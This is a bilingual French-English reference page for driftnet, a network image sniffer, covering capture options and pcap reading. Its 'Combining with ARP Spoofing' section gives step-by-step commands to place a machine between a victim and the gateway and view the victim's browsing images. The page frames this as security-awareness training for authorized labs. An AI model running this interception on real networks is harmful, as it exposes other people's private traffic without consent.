driftnet

Renifleur d'images en temps réel depuis le trafic réseau. Capture et affiche les images issues du trafic HTTP non chiffré sur le réseau : extrait les JPEG, GIF, PNG et autres images à mesure qu'ils transitent. Real-time image sniffer from network traffic. Captures and displays images from unencrypted HTTP traffic on the network — extracts JPEG, GIF, PNG and other images as they pass through.

↗ https://github.com/i-rinat/driftnet

Overview

driftnet listens to network traffic and extracts images from TCP streams in real-time. It displays captured images in a window as they appear in unencrypted HTTP traffic — primarily a demonstration tool for network security awareness training showing why HTTPS matters.

Basic Usage

Capture images from live network traffic

sudo driftnet -i eth0

Read from pcap file

driftnet -f capture.pcap

Headless mode (save images, no display)

sudo driftnet -i eth0 -a -d /tmp/captured_images/

Verbose with all image types

sudo driftnet -i eth0 -v

Capture Options

Specify interface

sudo driftnet -i wlan0

Filter by BPF expression

sudo driftnet -i eth0 -p 'port 80'

Headless (no GUI window)

sudo driftnet -a -i eth0 -d /tmp/images/

Save images to directory

sudo driftnet -a -d /tmp/images/ -i eth0

Also capture audio (MPEG streams)

sudo driftnet -i eth0 -s

Reading from pcap

Process existing capture

driftnet -f capture.pcap -a -d /tmp/images/

With verbose output

driftnet -f capture.pcap -v -a -d /tmp/images/

Combining with ARP Spoofing

Step 1: Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward
# Step 2: ARP spoof between victim and gateway
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

Step 3: Capture victim’s browsing images

sudo driftnet -i eth0
# Images from victim's HTTP traffic appear in real-time

Tips

  • Only works on unencrypted HTTP — modern HTTPS sites show nothing
  • Demonstrates clearly why HTTPS is essential — valuable for security awareness training
  • Use on your own network or in authorized lab environments only
  • Headless mode (-a -d /path/) is better for captured traffic analysis
  • Most modern web traffic is HTTPS — effectiveness has declined significantly
Help / Man page
driftnet [options]

-i IFACE    Network interface
-f FILE     Read from pcap file
-a          Headless (no display window)
-d DIR      Save images to directory
-v          Verbose
-p FILTER   BPF packet filter
-s          Also capture audio streams
-j          JPEG images only
-g          GIF images only
-n          Don't display non-image connections

Vue d’ensemble

driftnet écoute le trafic réseau et extrait les images des flux TCP en temps réel. Il affiche les images capturées dans une fenêtre à mesure qu’elles apparaissent dans le trafic HTTP non chiffré : principalement un outil de démonstration pour la sensibilisation à la sécurité réseau, montrant pourquoi HTTPS est important.

Utilisation de base

# Capturer des images depuis le trafic réseau en direct
sudo driftnet -i eth0

# Lire depuis un fichier pcap
driftnet -f capture.pcap

# Mode headless (sauvegarder les images, sans affichage)
sudo driftnet -i eth0 -a -d /tmp/captured_images/

# Verbeux avec tous les types d'images
sudo driftnet -i eth0 -v

Options de capture

# Spécifier l'interface
sudo driftnet -i wlan0

# Filtrer par expression BPF
sudo driftnet -i eth0 -p 'port 80'

# Headless (pas de fenêtre GUI)
sudo driftnet -a -i eth0 -d /tmp/images/

# Sauvegarder les images dans un répertoire
sudo driftnet -a -d /tmp/images/ -i eth0

# Capturer aussi l'audio (flux MPEG)
sudo driftnet -i eth0 -s

Lecture depuis un pcap

# Traiter une capture existante
driftnet -f capture.pcap -a -d /tmp/images/

# Avec sortie verbeuse
driftnet -f capture.pcap -v -a -d /tmp/images/

Combinaison avec l’ARP spoofing

Étape 1 : Activer le forwarding IP

echo 1 > /proc/sys/net/ipv4/ip_forward
# Étape 2 : ARP spoof entre la victime et la passerelle
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &

Étape 3 : Capturer les images de navigation de la victime

sudo driftnet -i eth0
# Les images issues du trafic HTTP de la victime apparaissent en temps réel

Conseils

  • Ne fonctionne que sur du HTTP non chiffré : les sites HTTPS modernes n’affichent rien
  • Démontre clairement pourquoi HTTPS est essentiel : précieux pour la sensibilisation à la sécurité
  • À utiliser uniquement sur votre propre réseau ou dans des environnements de lab autorisés
  • Le mode headless (-a -d /path/) est préférable pour l’analyse de trafic capturé
  • La majorité du trafic web moderne est en HTTPS : l’efficacité a considérablement décliné
Aide / Page de manuel
driftnet [options]

-i IFACE    Network interface
-f FILE     Read from pcap file
-a          Headless (no display window)
-d DIR      Save images to directory
-v          Verbose
-p FILTER   BPF packet filter
-s          Also capture audio streams
-j          JPEG images only
-g          GIF images only
-n          Don't display non-image connections